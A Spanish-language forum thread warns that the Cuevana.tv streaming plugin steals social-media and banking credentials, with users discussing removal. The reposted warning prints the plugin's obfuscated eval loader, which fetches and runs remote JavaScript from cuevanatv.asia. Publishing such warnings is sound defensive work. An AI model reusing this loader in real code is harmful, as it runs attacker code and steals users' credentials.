PUBLICIDAD
Wilas

El plug-in de CUEVANA.TV ROBA DATOS Y CONTRASEÑAS de los usuarios

X

X-MEN2

Invitado
El plug-in de CUEVANA.TV ROBA DATOS Y CONTRASEÑAS de los usuarios « Galactic Cow
Cuevana.tv, la conocida web de visionado online usada por varios millones de personas ha sido reportada como una web de “phising” (robo de datos sensibles) al detectar que el plugin que utiliza para supuestamente hacer streaming de los contenidos, contiene codigo malicioso utilizado para robar tus datos de redes sociales como Facebook e incluso de sitios de banca online como Banco Santander, Paypal y otros servicios de pago generalmente latinoamericanos.

Al parecer, al intentar visionar contenido de su sitio, éste pide autorización para instalar un complemento (plugin) para tu navegador (tanto firefox como chrome).
Este complemento aparentemente inofensivo resulta tener escondido en su código un script que contacta con el sitio web http://cuevanatv.asia que contiene codigos en JavaScript para efectuar el robo de tus datos personales cada vez que rellenas un formulario en un sitio de confianza.
Se recomienda encarecidamente a todas las personas que alguna vez hayan visitado este conocido portal de streaming que revisen sus navegadores y eliminen el plugin “Cuevana Streaming”.
Despues de este procedimiento es obligatorio cambiar todas tus claves que hayan podido ser interceptadas por este script malicioso.
Si deseas investigar el plugin, solo necesitas descargarlo desde hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi y extraerlo con un descompresor de archivos (WinRar, 7Zip…), despues abre el archivo “script-compiler.js” que encontrarás en la carpeta “content”.
Una vez abierto ese archivo observa la linea número 232.
Código:
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 0=7 5();0.4(\'1\',\'2://3.8/h.9?\'+g.e(),d);0.a(b);c(0.f);',18,18,'r|GET|http|cuevanatv|open|XMLHttpRequest|var|new|asia|js|send|null|eval|false|random|responseText|Math|back3'.split('|'),0,{}))

En ella se encuentra este fragmento de código que lanza una petición hacia la web http://cuevanatv.asia que es la que captura los datos personales.
Muchos usuarios ya estan haciendo eco de la noticia bajo los hashtag #Cuevana , #CuevanaRoba y #PluginCuevana

https://twitter.com/i/#!/search/?q=cuevana&src=typd
=======

Nota: por seguridad siempre me dio temor instalar el plugin pues aparecía una aviso de Firefox y a tenía problemas con algunos antivirus. Solo en una ocasión utilicé Cuevana y no funcionó para ver una serie de tv, no cargaba. Así que para los usuarios a desinstalar el plugin.
 
Que madre!! yo instale esa madre y uso paypal y compro mucho en amazon... voy a borrarlo de una.
 
Yo nunca instalo plug-ins o barras "útiles" de ningún sitio. Esos plug-ins "necesarios para ver contenido" lo único que hacen es rastrear lo que usted hace en internet, interceptar su e-mail para llenarlo de spam o en el peor de los casos, las claves de correos, bancos y sitios sociales.

En el menos peor de los casos, las claves las usan para meterse a su correo, bancos, etc. para sacar datos de mercadeo y ver cuáles son sus preferencias y comportamientos. En el peor de los casos, termina con las cuentas secuestradas para mandar spam o vaciarle la cuenta del banco.

Los únicos plug-ins que tengo instalados en la compu son Java, Shockwave, Flash y pare de contar. Yo me largo inmediatamente de cualquier sitio que me pida un plug-in para ver contenido.
 
A mi nunca me dió confianza ese sitio ni sus plug-ins. Prefiero quedarme sin ver peliculas antes de que me dejen la cuenta en ceros o se jalen alguna otra torta.
 
Yo nunca instalo plug-ins o barras "útiles" de ningún sitio. Esos plug-ins "necesarios para ver contenido" lo único que hacen es rastrear lo que usted hace en internet, interceptar su e-mail para llenarlo de spam o en el peor de los casos, las claves de correos, bancos y sitios sociales.

En el menos peor de los casos, las claves las usan para meterse a su correo, bancos, etc. para sacar datos de mercadeo y ver cuáles son sus preferencias y comportamientos. En el peor de los casos, termina con las cuentas secuestradas para mandar spam o vaciarle la cuenta del banco.

Los únicos plug-ins que tengo instalados en la compu son Java, Shockwave, Flash y pare de contar. Yo me largo inmediatamente de cualquier sitio que me pida un plug-in para ver contenido.

Nada mas que agregar, muy completo.
 
Solo afecto a personas del 1 - 16 de septiembre que descargaron en este momento el pugin y que usaban firefox los demas estan bien y aun si estan entre estas personas no quiere decir que realmente les robaron algo pero si fuera asi nada mas cambinen las claves de los cosas importantes como de las cuentas paypal y amazon y ebay y ya :)
 
Yo solo una vez lo instalé porque Firefox anunciaba que no era seguro. Y eso hace mucho tiempo. No usé el servicio porque se cortaban las películas y había que esperar mucho.

En Netflix hay que instalar Silverlight pero es un plugin de Microsoft parecido a flash.
 
El graboid es un software instalado que sirve para descargar videos no usa codecs de reproduccion al menos que yo sepa
 
Que lástima tuve que desinstalarlo, pero si le había encontrado bastante utilidad para ver series de vez en cuando. Para ver películas había que dejarlas cargando un gran rato porque si no se pegaba todo, descargaba entre 30 y 40 KB/s y tengo capacidad para descargar hasta 256 KB/s efectivos (tengo 2 Mb)
 

Nuevos temas

📑 Evite Incurrir en Multas y Sanciones: Ofrecemos servicios de presentación de declaraciones de IVA (D104), alquileres (D125) y renta (D101) a partir de $20 mensuales.

Posts recientes

¿Costa Rica debería reelegir inmediatamente a Rodrigo Chaves?

  • Sí, es el mejor presidente de todos los tiempos

    Votos: 54 50,9%
  • No, mejor elegir otro candidato

    Votos: 52 49,1%
💼 Factura Electrónica sin Mensualidades ni Anualidades. Inscripción gratis en Hacienda.
#1 en FACTURA ELECTRÓNICA
Arriba Pie